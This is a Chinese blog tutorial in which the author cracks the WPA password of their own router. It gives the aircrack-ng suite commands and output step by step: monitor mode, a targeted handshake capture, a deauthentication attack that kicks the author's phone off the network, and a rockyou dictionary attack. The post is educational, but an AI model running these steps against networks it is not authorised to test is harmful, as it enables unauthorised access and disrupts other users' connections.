思享工具箱

无线网络密码破解初体验

摘要:
准备一个路由器,一个可以设置为混合模式的无线网卡,kalilinux在这个实验中破解的基本WiFi信息如下:获取当前环境Wi-Fi 1.查看无线网卡iwconfigwlan0的当前工作模式,例如:㉿ 钾)-[~]㉿ - $iwonfigwlan0wlan0IEEE802.11ESSID:关闭/anyMode:管理接入点:未关联Tx

实验准备

准备一台路由器、可以设置为混杂模式的无线网卡和kali linux

本次实验破解的WiFi基本信息如下:

无线网络密码破解初体验第1张

获取当前环境Wi-Fi

1. 查看当前无线网卡工作模式

iwconfig wlan0

如:

┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

2. 设置网卡为混杂模式

设置为混杂模式(Monitor)时会提示需要kill掉一些干扰进程,使用 airmon-ng check kill 可以kill掉干扰进程

sudo airmon-ng start wlan0

如下,设置为混杂模式后 wlan0 变成了 wlan0mon

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng start wlan0
[sudo] shelmean 的密码:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  411 NetworkManager
  576 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           mt76x2u         MediaTek Inc. MT7612U 802.11a/b/g/n/ac
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

┌──(shelmean㉿kali)-[~]
└─$ ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 8  bytes 400 (400.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 400 (400.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 8C-88-2B-10-04-16-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 1821  bytes 574539 (561.0 KiB)
        RX errors 0  dropped 1821  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


┌──(shelmean㉿kali)-[~]
└─$ iwconfig wlan0mon
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

3. kill掉干扰进程

┌──(shelmean㉿kali)-[~]
└─$ sudo airmon-ng check kill 

Killing these processes:

  PID Name
  576 wpa_supplicant

4. 扫描附近 Wi-Fi

sudo airodump-ng wlan0mon

无线网络密码破解初体验第2张

抓取四次握手报文

1. 指定抓取指定无线网络的报文

sudo airodump-ng -c 6 --bssid 24:6F:8C:80:16:60 -w mercury.cap wlan0mon

测试 Wi-Fi 为 ABC-Mercury-2.4G,扫描出来看到 BSSID 为 24:6F:8C:80:16:60 信道为 6

抓取的报文保存为 mercury.cap

目前有两个Station连接在上面,其中 9C:28:F7:9A:1B:14 为我自己的手机Mac

无线网络密码破解初体验第3张

2. 将station踢下线

为了抓取四次握手报文,新开一个terminal,使用 aireplay-ng 攻击工具将 station 踢下线

aireplay-ng -0 5 -a 24:6F:8C:80:16:60 -c 9C:28:F7:9A:1B:14  wlan0mon

无线网络密码破解初体验第4张

 然后等手机重连,可以看到抓取到了握手报文

无线网络密码破解初体验第5张

3. 跑字典

rockyou.txt 为字典文件

aircrack-ng -w rockyou.txt -b 24:6F:8C:80:16:60 mercury.cap-01.cap

无线网络密码破解初体验第6张

 短短几分钟就找到我们路由器的密码了

标签:#sudo | 浏览:175 | 发布日期:

免责声明:文章转载自《无线网络密码破解初体验》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇C# Parsing 类实现的 PDF 文件分析器编程哲学下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Ubuntu 下修改docker的默认存储位置

Ubuntu 下修改docker的默认存储位置 docker安装完成后,会将所有的镜像文件按照到系统的默认路径,有时候我们的系统盘会比较小,而docker的镜像数据又很大,我们想要修改下镜像的存储路径,该怎么修改呢? 通常docker当前镜像路径可以通过 docker info 来查看,下图是未修改前的 docker 信息: docker info...

Ubuntu 常用工具

由于工作关系,开始慢慢接触linux了,把常用命令写博客上随时查看,随时添加。 把终端加到右键菜单:sudo apt-get install nautilus-open-terminal 安装flash插件 sudo cp libflashplayer.so /usr/lib/mozilla/plugins/sudo cp ./usr/* /usr 安装:...

ubuntu下发布asp.net core并用nginx代理之旅(续)

前面实现了ubuntu下的发布,然而实际项目一般为visual studio中发布文件系统,然后上传至生产环境中,(部分参考:上传文件到linux - ubuntu) 这节就发布到生产环境中的: 1.首先,在生产环境中搭建ftp服务端,方便我们上传文件至服务端中,以vsftpd为例: 首先安装vsftpd (不得不说ubuntu的apt-get用起来确实方...

如何使能hyper-v的增强功能?

1. 在hyper-v的设置中使能增强功能 2. 运行在hyper-v中的虚拟机(笔者使用ubuntu版本为bionic)中安装xrdp   2.1 获取安装脚本     $ git clone https://github.com/jterry75/xrdp-init.git ~/xrdp-init   2.2 安装xrdp     $ cd ~/xrd...

deepin安装、破解navicat

我首先是跟着资料做的,途中,有很多的地址已经失效了,我换成了经过实践后有效的链接,这篇博客是根据记忆来的,未经实践,如有不对的地方,欢迎指正 新建个目录放要下载的文件 mkdir /data/home/ly-deepin/soft 去官网下载 官网下载地址:http://www.navicat.com.cn/download/navicat-premium...

sudo apt update 没有 Release 文件

注: 不同环境出错原因可能不同,本文仅供参考。 今天在Ubuntu 19.04 系统运行指令 sudo apt update 时,忽然提示错误,报错如下: 404 Not Found [IP: 101.6.8.193 443] 没有 Release 文件。 N: 无法安全地用该源进行更新,所以默认禁用该源。 N: 参见 apt-secure(8) 手...

最新文章

随机推荐

思享工具箱导航